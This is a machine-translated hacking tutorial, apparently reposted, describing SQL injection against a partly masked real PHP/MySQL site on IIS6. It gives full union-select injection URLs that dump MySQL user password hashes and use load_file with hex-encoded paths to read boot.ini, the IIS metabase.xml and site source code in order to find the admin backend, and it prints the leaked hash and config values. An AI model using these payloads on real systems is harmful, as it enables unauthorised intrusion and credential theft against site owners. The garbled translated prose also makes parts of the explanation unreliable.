[Go]php mysql inject load_file IIS config file get background address

1. Unable to find the backend address, then simply explodeMysqlAdministrator's password
Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat (User,password), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
get the data:Root*cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd

2. Random access to a path, feedback isIIS6of the404the default page, which indicates that the Web server is:Windows+iis6+php+mysqlthe Environment
first putC:\\Boot.iniThis string of paths isHexThe code gets:0x633a5c5c626f6f742e696e69
Then,Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file (0x633A5C5C626F6F742E696E69) , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
See Echo:

[boot loader] timeout=30 default=multi (0) disk (0) rdisk (0) partition (1) \ Windows [operating systems] multi (0) disk (0) rdisk (0) partition (1) \windows= "WINDOWS Server 2003, Enterprise"/fastdetect/noexecute=optout

Although you canLoad_fileloading files, but it seems to be of little use. No, not also, since it isIIS6, then loadC:\\windows\\system32\\inetsrv\\metabase.xmlThis path will allow you to get the site configuration information.
*Note:Windowsfile operation, the path must be double slash, if it is a single slash, probably willLoad_filefailure to explore its cause, probably because the slash is like this\Top left and right down, andLinuxis the/Top right, lower left. If theWindowsthe path slash followed by aTalso\ tand see what's in programming? If\ nit? \ 'it? Yes, the slash on the path is gone. If it is a double slash,\\that's the real single slash. If you need to output a double slash, then you have to use four slash to indicate, depressed not? \\\\
The last sentence to be injected is:Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

Mainly look at these sentence configuration:

<iiswebserver location = "/lm/w3svc/2125961364"

authflags= "0"

logextfileflags= "Logextfiledate | LogExtFileTime | Logextfileclientip | Logextfileuristem | Logextfileuriquery | LogExtFileHttpStatus | Logextfilewin32status | Logextfileserverport | logextfileuseragent | Logextfilehttpsubstatus "

logfiledirectory= "E:\flylog"

Logfilelocaltimerollover= "FALSE"

logfileperiod= "1"

Logfiletruncatesize= "20971520"

Logpluginclsid= "{ff160663-de82-11cf-bc0a-00aa006111e0}"

Serverautostart= "TRUE"

Serverbindings= ": 80:***.com.cn

: 80:www.***.com.cn "

Servercomment= "***.com.cn"

>

</IIsWebServer>

And also:

<iiswebvirtualdir location = "/lm/w3svc/2125961364/root"

accessflags= "AccessRead | AccessWrite | AccessScript "

Appfriendlyname= " default application "

Appisolated= "2"

approot= "/lm/w3svc/2125961364/root"

authflags= "AuthAnonymous | AUTHNTLM "

Defaultdoc= "Yindao.html,index.html,index.php,default.htm,default.asp,index.htm"

dirbrowseflags= "DirBrowseShowDate | Dirbrowseshowtime | Dirbrowseshowsize | dirbrowseshowextension | Dirbrowseshowlongdate | EnableDefaultDoc "

Path= "F:\web\2010716\new_flyer"

Uncpassword= " 49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a43833 66f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380 "

>

</IIsWebVirtualDir>

here we construct:

Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
Right-click to view the source code.
*Note:Load_fileWhen you use it, it's best to add one outsideHexnamely:Hex (load_file (xxxxxxx))
because I met a website, the home page does not know where the code is problematic, injecting points on the home page. I use the homepageLoad_filehome file, not nested outsideHex, the homepage is looped, which is something like this:Indexthere's aiframe,iframeLoaded is theIndexthis file,Indexinside this file,iframeLoad AgainIndexThis file goes through the loop until the machine resources are exhausted. Although I don't know if that site was theiframe, but such nesting does have a dead loop occurring, so it is recommendedHexNestingLoad_file
What I'm more concerned aboutIndexinside the code for a place like this:

Require (' admin_flier/common/function.php ');

Require (' admin_flier/lib/class/form.class.php ');

Require (' admin_flier/lib/class/db.class.php ');

Require (' admin_flier/lib/class/page.class.php ');

Include (' inc/head.php ');

Oh, this is not the back office address?

[Go]php mysql inject load_file IIS config file get background address